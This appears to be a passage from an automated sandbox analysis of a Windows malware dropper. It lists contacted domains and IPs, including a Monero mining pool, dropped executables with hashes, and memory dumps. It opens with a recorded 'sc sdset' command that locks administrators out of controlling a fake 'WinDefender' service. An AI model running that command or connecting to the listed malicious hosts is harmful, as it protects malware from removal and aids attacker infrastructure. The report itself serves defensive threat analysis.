sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
DE 148.251.234.93:443 yip.su tcp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 jetpackdelivery.net udp
US 8.8.8.8:53 bolidare.beget.tech udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 net.geo.opera.com udp
US 85.217.144.143:80 85.217.144.143 tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 link.storjshare.io udp
US 8.8.8.8:53 d062.userscloud.net udp
US 172.67.187.122:443 lycheepanel.info tcp
US 188.114.97.0:443 jetpackdelivery.net tcp
NL 13.227.219.74:443 downloads.digitalpulsedata.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 172.67.216.81:443 flyawayaero.net tcp
DE 168.119.140.62:443 d062.userscloud.net tcp
RU 91.106.207.50:80 bolidare.beget.tech tcp
US 8.8.8.8:53 justsafepay.com udp
US 8.8.8.8:53 potatogoose.com udp
US 188.114.96.0:443 justsafepay.com tcp
US 104.21.35.235:443 potatogoose.com tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
RU 45.8.228.16:80 goboh2b.top tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 143.144.217.85.in-addr.arpa udp
US 8.8.8.8:53 10.64.42.5.in-addr.arpa udp
US 8.8.8.8:53 122.187.67.172.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 74.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 2.77.0.136.in-addr.arpa udp
US 8.8.8.8:53 81.216.67.172.in-addr.arpa udp
US 8.8.8.8:53 62.140.119.168.in-addr.arpa udp
US 8.8.8.8:53 50.207.106.91.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 235.35.21.104.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 16.228.8.45.in-addr.arpa udp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 136.0.77.2:80 link.storjshare.io tcp
BG 193.42.32.29:80 193.42.32.29 tcp
BG 193.42.32.29:80 193.42.32.29 tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 29.32.42.193.in-addr.arpa udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 185.26.182.123:443 autoupdate.geo.opera.com tcp
NL 185.26.182.123:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 features.opera-api2.com udp
US 8.8.8.8:53 download.opera.com udp
NL 185.26.182.106:443 features.opera-api2.com tcp
NL 82.145.216.24:443 download.opera.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 download3.operacdn.com udp
GB 95.101.143.243:443 download3.operacdn.com tcp
US 8.8.8.8:53 demo.seafile.com udp
DE 168.119.152.22:80 demo.seafile.com tcp
DE 168.119.152.22:443 demo.seafile.com tcp
US 8.8.8.8:53 123.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 176.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 24.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 106.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 243.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 22.152.119.168.in-addr.arpa udp
US 8.8.8.8:53 m7val1dat0r.info udp
US 188.114.97.0:443 m7val1dat0r.info tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
US 8.8.8.8:53 bapp.digitalpulsedata.com udp
CA 3.98.219.138:443 bapp.digitalpulsedata.com tcp
US 8.8.8.8:53 138.219.98.3.in-addr.arpa udp
US 8.8.8.8:53 connectini.net udp
GB 91.109.116.11:443 connectini.net tcp
US 8.8.8.8:53 11.116.109.91.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 vibrator.s3.pl-waw.scw.cloud udp
PL 151.115.10.1:443 vibrator.s3.pl-waw.scw.cloud tcp
US 8.8.8.8:53 link.storjshare.io udp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 1.10.115.151.in-addr.arpa udp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
US 136.0.77.2:443 link.storjshare.io tcp
DE 3.5.135.126:443 wewewe.s3.eu-central-1.amazonaws.com tcp
US 8.8.8.8:53 154.238.16.2.in-addr.arpa udp
US 8.8.8.8:53 126.135.5.3.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
CA 192.18.149.161:7001 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 161.149.18.192.in-addr.arpa udp
RU 5.42.64.10:80 5.42.64.10 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
DE 5.75.216.44:27015 5.75.216.44 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 23.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 44.216.75.5.in-addr.arpa udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 script.google.com udp
DE 172.217.23.206:80 script.google.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
DE 172.217.23.206:443 script.google.com tcp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 script.googleusercontent.com udp
NL 142.251.36.1:443 script.googleusercontent.com tcp
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 173.214.169.17:443 tcp
US 8.8.8.8:53 17.169.214.173.in-addr.arpa udp
US 136.0.77.2:443 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 360devtracking.com udp
GB 91.109.116.11:80 360devtracking.com tcp
US 8.8.8.8:53 104.193.132.51.in-addr.arpa udp
US 8.8.8.8:53 bapp.digitalpulsedata.com udp
CA 3.98.219.138:443 bapp.digitalpulsedata.com tcp
BG 193.42.32.29:80 193.42.32.29 tcp
US 8.8.8.8:53 875b9eec-31c6-4887-b2af-23f23ba6f10a.uuid.ramboclub.net udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 server10.ramboclub.net udp
US 8.8.8.8:53 stun4.l.google.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
BG 185.82.216.48:443 server10.ramboclub.net tcp
US 74.125.204.127:19302 stun4.l.google.com udp
US 8.8.8.8:53 mastertryprice.com udp
US 172.67.212.103:443 mastertryprice.com tcp
US 8.8.8.8:53 127.204.125.74.in-addr.arpa udp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 48.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 103.212.67.172.in-addr.arpa udp
CA 174.138.115.38:7001 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 8.8.8.8:53 38.115.138.174.in-addr.arpa udp

Files

memory/228-0-0x00007FF69F150000-0x00007FF69F52E000-memory.dmp

memory/708-6-0x00007FFCF6740000-0x00007FFCF712C000-memory.dmp

memory/708-5-0x0000028BD8D70000-0x0000028BD8D92000-memory.dmp

memory/708-7-0x0000028BF1220000-0x0000028BF1230000-memory.dmp

memory/708-8-0x0000028BF1220000-0x0000028BF1230000-memory.dmp

memory/708-11-0x0000028BF13B0000-0x0000028BF1426000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3uf4ppl.l0t.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/228-12-0x00007FF69F150000-0x00007FF69F52E000-memory.dmp

memory/932-25-0x0000000000400000-0x0000000000408000-memory.dmp

memory/708-30-0x0000028BF1220000-0x0000028BF1230000-memory.dmp

memory/932-28-0x0000000073300000-0x00000000739EE000-memory.dmp

memory/932-44-0x0000000005300000-0x0000000005310000-memory.dmp

memory/708-66-0x0000028BF1220000-0x0000028BF1230000-memory.dmp

memory/708-70-0x00007FFCF6740000-0x00007FFCF712C000-memory.dmp

C:\Users\Admin\Pictures\wW8toCx0Tryggk4RevW6qnGb.exe

MD5 dde72ae232dc63298465861482d7bb93
SHA1 557c5dbebc35bc82280e2a744a03ce5e78b3e6fb
SHA256 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
SHA512 389eb8f7b18fcdd1a6f275ff8acad211a10445ff412221796cd645c9a6458719cced553561e2b4d438783459d02e494d5140c0d85f2b3df617b7b2e031d234b2

C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

memory/3080-99-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

memory/4896-114-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\AppData\Local\BNtSqdoCSUzvLmoAAiNIkrAw.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\AppData\Local\Temp\is-H9RIU.tmp\TGbHTIuRYu12xMG6nWaxWvI6.tmp

MD5 83827c13d95750c766e5bd293469a7f8
SHA1 d21b45e9c672d0f85b8b451ee0e824567bb23f91
SHA256 8bd7e6b4a6be9f3887ac6439e97d3d3c8aaa27211d02ecbd925ab1df39afe7ae
SHA512 cdbdd93fc637772b12bdedb59c4fb72a291da61e8c6b0061ad2f9448e8c949543f003646b1f5ce3e1e3aebc12de27409ddd76d3874b8f4f098163a1ff328b6f0

C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

memory/4628-151-0x0000000073300000-0x00000000739EE000-memory.dmp

memory/4628-146-0x00000000008A0000-0x0000000000BBC000-memory.dmp

C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe

MD5 9110c26b4e982d541e19db0d4dd07ac4
SHA1 712dfa47ee8c828f01efa976de006679df20dde4
SHA256 960fb23ba0b64e081c49e12ea5062d95f15b1d1ccb63e743dac5ead8d2defa58
SHA512 a9f1acc4b5d90d01c45761ccf22945c4cef50c132d59db48b85f03eaebd27939550677333869c89dfbe09236dcb0db0c824fce1a37da4c394a9871155795a378

C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe

MD5 9110c26b4e982d541e19db0d4dd07ac4
SHA1 712dfa47ee8c828f01efa976de006679df20dde4
SHA256 960fb23ba0b64e081c49e12ea5062d95f15b1d1ccb63e743dac5ead8d2defa58
SHA512 a9f1acc4b5d90d01c45761ccf22945c4cef50c132d59db48b85f03eaebd27939550677333869c89dfbe09236dcb0db0c824fce1a37da4c394a9871155795a378

C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe

MD5 9fd5293f6df01bd8e9daaf7820589b78
SHA1 be58cf67fc310d8b8fe706a6dccdffa52aeb1e35
SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe

MD5 9fd5293f6df01bd8e9daaf7820589b78
SHA1 be58cf67fc310d8b8fe706a6dccdffa52aeb1e35
SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\IqALfhDHbGJ6YupG2e5WObJc.exe

MD5 24fe48030f7d3097d5882535b04c3fa8
SHA1 a689a999a5e62055bda8c21b1dbe92c119308def
SHA256 424a2551d356754c882d04ac16c63e6b50b80b159549d23231001f629455756e
SHA512 45a842447d5e9c10822f7d5db1192a0e8e7917e6546dab6aebe2542b5a82bedc26aa8d96e3e99de82e2d0b662fcac70d6914248371af034b763f5dd85dab0c51

C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp

MD5 ebec033f87337532b23d9398f649eec9
SHA1 c4335168ec2f70621f11f614fe24ccd16d15c9fb
SHA256 82fdd2282cf61cfa6155c51a82c4db79487ffeb377d0245d513edeb44d731c16
SHA512 3875c2dd9bbeb5be00c2ccf8391bcb92d328a3294ce5c2d31fd09f20d80e12bd610d5473dfc2e13962578e4bb75336615cdf16251489a31ecbe4873d09cf1b11

memory/932-160-0x0000000073300000-0x00000000739EE000-memory.dmp

C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

MD5 4dcf3c5bf7efb2112eb1249a6c0a28bd
SHA1 f93aaf9f98154e0c23c2f0df806d46dd223f1a39
SHA256 86b86bf20ed0d0a79e459e9a040e0f398b0c6e186b3d4dfff5471f7c3bee002d
SHA512 3719722ccc3d0eb9eefc116bc8f719c2ce0c963fa735679049b984e2c4018f838f3aa340db9f1d9bea90c76beeb5292a192a7b2f99308af60de3fd4049b13024

memory/2248-168-0x0000000000B60000-0x00000000010AD000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050449540302248.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/4628-171-0x0000000005810000-0x0000000005D0E000-memory.dmp

C:\Users\Admin\Pictures\bu5UWBMNJxJyXBl36BFg9XOI.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

C:\Users\Admin\Pictures\bu5UWBMNJxJyXBl36BFg9XOI.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

memory/3828-172-0x00000000008B0000-0x00000000008B1000-memory.dmp

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

MD5 4dcf3c5bf7efb2112eb1249a6c0a28bd
SHA1 f93aaf9f98154e0c23c2f0df806d46dd223f1a39
SHA256 86b86bf20ed0d0a79e459e9a040e0f398b0c6e186b3d4dfff5471f7c3bee002d
SHA512 3719722ccc3d0eb9eefc116bc8f719c2ce0c963fa735679049b984e2c4018f838f3aa340db9f1d9bea90c76beeb5292a192a7b2f99308af60de3fd4049b13024

memory/4104-183-0x00007FF64FE30000-0x00007FF64FF1C000-memory.dmp

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

MD5 4dcf3c5bf7efb2112eb1249a6c0a28bd
SHA1 f93aaf9f98154e0c23c2f0df806d46dd223f1a39
SHA256 86b86bf20ed0d0a79e459e9a040e0f398b0c6e186b3d4dfff5471f7c3bee002d
SHA512 3719722ccc3d0eb9eefc116bc8f719c2ce0c963fa735679049b984e2c4018f838f3aa340db9f1d9bea90c76beeb5292a192a7b2f99308af60de3fd4049b13024

memory/4940-187-0x00000000001F0000-0x00000000001F1000-memory.dmp

memory/4628-185-0x0000000005D10000-0x0000000005ED2000-memory.dmp

memory/4628-182-0x0000000005400000-0x0000000005492000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

memory/2472-192-0x0000000000B60000-0x00000000010AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-UJ6HF.tmp\_isetup\_setup64.tmp

MD5 e4211d6d009757c078a9fac7ff4f03d4
SHA1 019cd56ba687d39d12d4b13991c9a42ea6ba03da
SHA256 388a796580234efc95f3b1c70ad4cb44bfddc7ba0f9203bf4902b9929b136f95
SHA512 17257f15d843e88bb78adcfb48184b8ce22109cc2c99e709432728a392afae7b808ed32289ba397207172de990a354f15c2459b6797317da8ea18b040c85787e

memory/4628-197-0x00000000053F0000-0x0000000005400000-memory.dmp

memory/932-196-0x0000000005300000-0x0000000005310000-memory.dmp

memory/4628-193-0x00000000055E0000-0x0000000005646000-memory.dmp

memory/4628-191-0x0000000005540000-0x00000000055DC000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050449550612472.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

MD5 4dcf3c5bf7efb2112eb1249a6c0a28bd
SHA1 f93aaf9f98154e0c23c2f0df806d46dd223f1a39
SHA256 86b86bf20ed0d0a79e459e9a040e0f398b0c6e186b3d4dfff5471f7c3bee002d
SHA512 3719722ccc3d0eb9eefc116bc8f719c2ce0c963fa735679049b984e2c4018f838f3aa340db9f1d9bea90c76beeb5292a192a7b2f99308af60de3fd4049b13024

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\O7qOvO0qMmQjettcsUNpgMj9.exe

MD5 4dcf3c5bf7efb2112eb1249a6c0a28bd
SHA1 f93aaf9f98154e0c23c2f0df806d46dd223f1a39
SHA256 86b86bf20ed0d0a79e459e9a040e0f398b0c6e186b3d4dfff5471f7c3bee002d
SHA512 3719722ccc3d0eb9eefc116bc8f719c2ce0c963fa735679049b984e2c4018f838f3aa340db9f1d9bea90c76beeb5292a192a7b2f99308af60de3fd4049b13024

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310050449569361200.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050449569361200.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/1200-206-0x0000000000DB0000-0x00000000012FD000-memory.dmp

